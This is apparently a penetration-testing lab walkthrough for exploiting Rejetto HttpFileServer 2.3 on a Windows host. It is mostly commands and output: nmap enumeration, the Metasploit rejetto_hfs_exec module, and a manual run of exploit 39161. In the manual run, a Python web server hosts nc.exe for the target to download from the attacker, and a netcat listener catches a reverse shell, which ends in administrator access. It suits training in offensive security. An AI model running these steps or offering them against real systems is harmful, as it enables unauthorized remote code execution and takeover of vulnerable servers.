HttpFileServer httpd 2.3(Rejetto)

#Enumeration

nmap -sV -p 80 10.4.19.119

80/tcp open  http    HttpFileServer httpd 2.3

#Exploitation

search hfs
use exploit/windows/http/rejetto_hfs_exec
options
# Check other options, TARGETURI, Payload options, LHOST ,LPORT if necessary
exploit

After running this module you will get your meterpreter session

#Manual Exploitation

nmap -sV 10.2.23.79

80/tcp    open  http               HttpFileServer httpd 2.3
135/tcp   open  msrpc              Microsoft Windows RPC
139/tcp   open  netbios-ssn        Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds       Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
3389/tcp  open  ssl/ms-wbt-server?
49152/tcp open  msrpc              Microsoft Windows RPC
49153/tcp open  msrpc              Microsoft Windows RPC
49154/tcp open  msrpc              Microsoft Windows RPC
49155/tcp open  msrpc              Microsoft Windows RPC
49165/tcp open  msrpc              Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

• Use searchsploit to identify HttpFileServer httpd 2.3 vulnerabilities

searchsploit HTTP File Server 2.3

• Copy the exploit to the Desktop

cd Desktop/
searchsploit -m 39161

Analyzing the Exploit

vim 39161.py

• Read the exploit

  • You need to be using a web server hosting netcat (http://<attackers_ip>:80/nc.exe). You may need to run it multiple times for success!

  • ip_addr - change to attacker Kali Linux IP

  • local_port - change to 1234

Execute the Exploit

• Save and run the exploit

# In a new terminal session
cd Desktop/
cp /usr/share/windows-resources/binaries/nc.exe .
python -m SimpleHTTPServer 80

# In a new terminal session
# Run the netcat listener on the exploit specified "local_port"
nc -nvlp 1234

# From the first terminal windows, run the exploit
python 39161.py 10.2.23.79 80

whoami
	win-omcnbkr66mn\administrator
systeminfo